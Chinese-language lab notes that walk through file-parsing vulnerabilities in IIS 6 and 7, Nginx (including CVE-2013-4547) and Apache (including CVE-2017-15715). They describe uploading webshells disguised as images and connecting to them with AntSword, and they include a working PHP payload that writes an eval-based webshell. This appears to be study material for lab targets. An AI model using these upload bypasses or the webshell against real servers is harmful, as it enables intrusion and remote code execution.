IIS
IIS6.X
1.在iis的网站根⽬录新建⼀个名为x.asp的文件
2.在x.asp中新建⼀个jpg⽂件。内容为<%=now()%> asp代码
3.在外部浏览器中访问windows2003的iis⽹站中的2.jpg 发现asp代码被执⾏
4.将2.jpg⽂件放到⽹站根⽬录下访问,发现其中的asp代码没有被解析。 由此可⻅.asp⽂件夹中的任意⽂件会被当做asp⽂件去执⾏
IIS7.X
1.配置 php.ini ⽂件,将 cgi.fix_pathinfo=1 取消掉...并重启
2.IIS --》 配置⽹站--》 处理程序映射--》 PHPStudy_FastCGI --》 请求限制 --》取消勾
3.将PHP⼀句话木马写到1.php并更改后缀为1.jpg上传到⽬标站点...利⽤解析漏洞进行访问
Nginx
nginx_parsing
1.访问靶机地址上传shell.jpg
2.拼接html后面的路径到我们的文件
3.连接蚁剑
CVE-2013-4547
访问靶机并上传 shell.php 文件,抓包,修改⽂件后缀为.jpg,在.jpg后⾯添加两个空格并给上 .php 后缀
在hex中将jpg后面第二个空格20改为00,放行
拼接html后的路径进行访问
Apache
apache_parsing
访问靶机并上传 shell.php.jpg 文件,文件内容为GIF89a<?php fputs(fopen("shw.php","w"),"<?php eval(\$_POST['cmd']);?>")?>
提交并查询
CVE-2017-15715
抓包
成功访问